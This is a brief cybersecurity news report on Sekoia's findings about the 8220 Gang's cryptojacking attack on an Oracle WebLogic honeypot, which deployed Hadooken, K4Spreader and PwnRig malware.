The 8220 hacker group is known for targeting both Windows and Linux web servers by deploying “crypto-jacking” malware to exploit vulnerabilities. The Linux infection utilized scripts named “c” and “y” to deploy the Hadooken malware, disable cloud protection tools, and attempt lateral movement through SSH brute-force attacks. On September 17, 2024, Sekoia’s Threat Detection & Research team identified a sophisticated cyber attack targeting both Windows and Linux systems through an Oracle WebLogic honeypot. This attack shared numerous similarities with a case reported by AquaSec on September 12, 2024, which includes the “common TTPs” and “IoCs,” strongly suggesting the involvement of the 8220 Gang. 8220 hacker group is a Chinese threat actor known since 2018 for targeting cloud environments to deploy cryptomining malware. Both target “WebLogic servers” using similar scripts (“c” and “y”) and the “lwp-download binary” for initial access. While the analysis suggests ‘Hadooken’ and ‘K4Spreader’ are distinct but related to “Go-based” malware. The “PwnRig” payload uses identical hashes, proxies (run.on-demand[.]pw), and Monero wallet across cases. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Get Latest Hacker News & Cyber Security Newsletters update Daily.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 01 Oct 2024 15:00:21 +0000